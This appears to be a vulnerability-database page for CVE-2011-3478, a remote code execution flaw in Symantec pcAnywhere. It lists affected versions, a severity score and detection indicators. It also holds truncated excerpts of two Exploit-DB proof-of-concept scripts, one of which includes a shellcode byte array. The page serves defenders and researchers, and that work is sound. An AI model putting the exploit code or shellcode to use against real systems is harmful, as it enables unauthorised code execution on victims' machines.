CVE-2011-3478
published 2012-01-25CVE-2011-3478: The host-services component in Symantec pcAnywhere 12.5.x through 12.5.3, and IT Management Suite pcAnywhere Solution 7.0 (aka 12.5.x) and 7.1 (aka 12.6.x)…
PriorityP275critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
39.31%
98.4th percentile
The host-services component in Symantec pcAnywhere 12.5.x through 12.5.3, and IT Management Suite pcAnywhere Solution 7.0 (aka 12.5.x) and 7.1 (aka 12.6.x), does not properly filter login and authentication data, which allows remote attackers to execute arbitrary code via a crafted session on TCP port 5631.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| symantec | pcanywhere | — | — |
| symantec | pcanywhere | — | — |
| symantec | pcanywhere | — | — |
| symantec | pcanywhere | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor for unauthenticated TCP connections to port 5631 (pcAnywhere) followed by the 4-byte init sequence \x00\x00\x00\x00 and handshake \x0d\x06\xfe, which is the exploit's session setup pattern. ↗
- →Alert on oversized login/password fields sent to TCP port 5631; the exploit sends a username of 100–175 bytes followed by a password buffer of ~3500 bytes, far exceeding normal authentication data sizes. ↗
- →The exploit targets awhost32.exe modules with no ASLR, SafeSEH, or NXCompat protections; detection of shellcode execution in this process context (NT AUTHORITY\SYSTEM) should be prioritised. ↗
- →Bad character for this exploit is only \x00; any large binary payload on TCP 5631 lacking null bytes in the password field should be treated as suspicious. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution
exploitdb·2015-11-02
CVE-2011-3478 Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution
Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution
---
#!/usr/bin/python
################################################################
# Exploit Title: Symantec pcAnywhere v12.5.0 Windows x86 RCE
# Date: 2015-10-31
# Exploit Author: Tomislav Paskalev
# Vendor Homepage: https://www.symantec.com/
# Software Link: http://esdownload.symantec.com/akdlm/CD/MTV/pcAnywhere_12_5_MarketingTrialware.exe
# Version: Symantec pcAnywhere v12.5.0 Build 442 (Trial)
# Vulnerable Software:
# Symantec pcAnywhere 12.5.x through 12.5.3
# Symantec IT Management Suite pcAnywhere Solution 7.0 (aka 12.5.x) and 7.1 (aka 12.6.x)
# Tested on:
# Symantec pcAnywhere v12.5.0 Build 442 (Trial)
# --------------------------------------------
# Microsoft Windows Vista Ultimate SP1 x86 EN
# Microsoft Windo
Exploit-DB
Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Remote Buffer Overflow
exploitdb·2012-06-27·CVSS 10.0
CVE-2011-3478 [CRITICAL] Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Remote Buffer Overflow
Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Remote Buffer Overflow
---
#!/usr/bin/python
# Exploit Title: Symantec PcAnywhere login and password field buffer overflow
# Date: 2012.06.27
# Author: S2 Crew [Hungary]
# Software Link: symantec.com
# Version: 12.5.0
# Tested on: Windows XP SP2
# CVE: CVE-2011-3478
#EDB Note: Needs adjustment but there is a crash
# Code :
import socket
import time
import struct
import string
import sys
shell = (
"\xda\xda\xbb\x9e\x7f\xfb\x04\xd9\x74\x24\xf4\x58\x2b\xc9"
"\xb1\x56\x31\x58\x18\x03\x58\x18\x83\xc0\x9a\x9d\x0e\xf8"
"\x4a\xe8\xf1\x01\x8a\x8b\x78\xe4\xbb\x99\x1f\x6c\xe9\x2d"
"\x6b\x20\x01\xc5\x39\xd1\x92\xab\x95\xd6\x13\x01\xc0\xd9"
"\xa4\xa7\xcc\xb6\x66\xa9\xb0\xc4\xba\x09\x88\x06\xcf\x48"
"\xcd\x7b\x3f\x18\x86\xf0\xed\x8d\xa3\x45\x2d\xaf
No writeups or analysis indexed.
http://osvdb.org/show/osvdb/78532http://secunia.com/advisories/48092http://www.securityfocus.com/bid/51592http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120124_00http://www.zerodayinitiative.com/advisories/ZDI-12-018/https://www.exploit-db.com/exploits/38599/http://osvdb.org/show/osvdb/78532http://secunia.com/advisories/48092http://www.securityfocus.com/bid/51592http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120124_00http://www.zerodayinitiative.com/advisories/ZDI-12-018/https://www.exploit-db.com/exploits/38599/
2012-01-25
Published